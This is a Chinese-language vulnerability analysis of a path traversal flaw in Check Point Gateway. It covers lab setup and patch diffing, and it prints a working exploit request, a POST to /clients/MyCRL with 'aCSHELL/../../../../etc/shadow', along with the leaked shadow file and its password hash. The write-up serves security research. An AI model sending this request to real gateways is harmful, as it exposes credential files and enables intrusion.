CheckPoint Gateway任意文件读取漏洞，远程攻击者可以通过构造恶意请求读取服务器上的任意文件，造成敏感信息泄露

环境启动

固件下载地址，导入vm中创建虚拟机

https://support.checkpoint.com/results/download/115148

选择虚拟系统

Red Hat Enterprise Linux 5 64

系统配置

设置密码：admin123

设置ip地址

安装登录后，访问刚刚设置的ip，并登录界面，下载配置SmartConsole，再次访问ip登录系统

漏洞分析

根据官方的补丁公告中我们可以找到官方提供的补丁链接受保护，需要login form进行身份验证才能访问下载，但是我们在系统文件中进行查找，找到了包含更新的 .tgz 文件，里面存放了补丁的elf文件

./CheckPoint#fw1#All#6.0#5#1#HOTFIX_R80_40_JHF_T211_BLOCK_PORTAL_MAIN/fw1/bin/vpn.full:
    - 文件类型: ELF 32-bit LSB
    - 架构: Intel   
    - 解释器: /lib/ld-linux.so.2  

日志记录

利用ida结合Diapora对比分析发现多了日志记录的功能，这里发现开发人员在日志中记录可能存在的路径遍历攻击，继续查看调用链发现

sub_80F9E0→sanitize_filename→日志记录函数

发现这里sub_80F9E0传递参数给/client/MyCRL，推测这里可以进行路径遍历漏洞的利用

sub_80F9E0

代码将用户请求的URL与字符表中的硬编码字符进行比较

这就意味着我们只需要通过一个包含表中的一个字符串的相对路径来匹配这里的硬编码表，但是这里只是一个文件而不能实现目录穿越

继续往下分析我们可以看到这里将请求的URL与一个字符串表进行比较，这里引用的字符串表中字符串末尾的/，证明这是一个目录表不只是一个文件

从而可以遍历目录，然后通过venerable返回

漏洞利用

发送请求

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
​
aCSHELL/../../../../../../../etc/shadow

请求文件报文

HTTP/1.0 200 OK
Date: 
Server: Check Point SVN foundation
Content-Type: text/html
X-UA-Compatible: IE=EmulateIE7
Connection: close
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 505
​
admin:$6$rounds=10000$N2We3dls$xVq34E9omWI6CJfTXf.4tO51T8Y1zy2K9MzJ9zv.jOjD9wNxG7TBlQ65j992Ovs.jDo1V9zmPzbct5PiR5aJm0:19872:0:99999:8:::
monitor:*:19872:0:99999:8:::
root:*:19872:0:99999:7:::
nobody:*:19872:0:99999:7:::
postfix:*:19872:0:99999:7:::
rpm:!!:19872:0:99999:7:::
shutdown:*:19872:0:99999:7:::
pcap:!!:19872:0:99999:7:::
halt:*:19872:0:99999:7:::
cp_postgres:*:19872:0:99999:7:::
cpep_user:*:19872:0:99999:7:::
vcsa:!!:19872:0:99999:7:::
_nonlocl:*:19872:0:99999:7:::
sshd:*:19872:0:99999:7:::